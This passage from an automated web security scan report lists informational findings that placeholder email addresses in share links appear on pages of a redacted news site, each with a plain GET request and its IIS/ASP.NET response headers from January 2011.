User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 54029


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.102. http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41322659/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41322659/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56425


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.103. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41323843/ns/world_news-mideastn_africa

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41323843/ns/world_news-mideastn_africa HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 190719


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

26.104. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41323843/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41323843/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 190068


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

26.105. http://www.msnbc.redacted/id/41324031

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324031

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324031 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 63568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.106. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324344/ns/world_news-south_and_central_asia

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324344/ns/world_news-south_and_central_asia HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 72587


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.107. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324344/ns/world_news-south_and_central_asia/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324344/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 72902


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.108. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324874/ns/us_news-weird_news

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324874/ns/us_news-weird_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56773


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.109. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324874/ns/us_news-weird_news/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324874/ns/us_news-weird_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 57532


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.110. http://www.msnbc.redacted/id/41324877/ns/world_news-europe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324877/ns/world_news-europe

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324877/ns/world_news-europe HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 79050


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.111. http://www.msnbc.redacted/id/41324877/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41324877/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41324877/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 79925


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.112. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326456/ns/business-media_biz/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41326456/ns/business-media_biz/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:57:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 62455


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.113. http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326559/ns/local_news-dallasfort_worth_tx/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41326559/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 52891


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.114. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326705/ns/world_news-south_and_central_asia

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41326705/ns/world_news-south_and_central_asia HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60185


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.115. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41326705/ns/world_news-south_and_central_asia/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41326705/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:54:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 59879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.116. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327238/ns/us_news-crime_and_courts/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41327238/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 67109


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.117. http://www.msnbc.redacted/id/41327694/ns/us_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327694/ns/us_news/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41327694/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:54:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 58924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.118. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
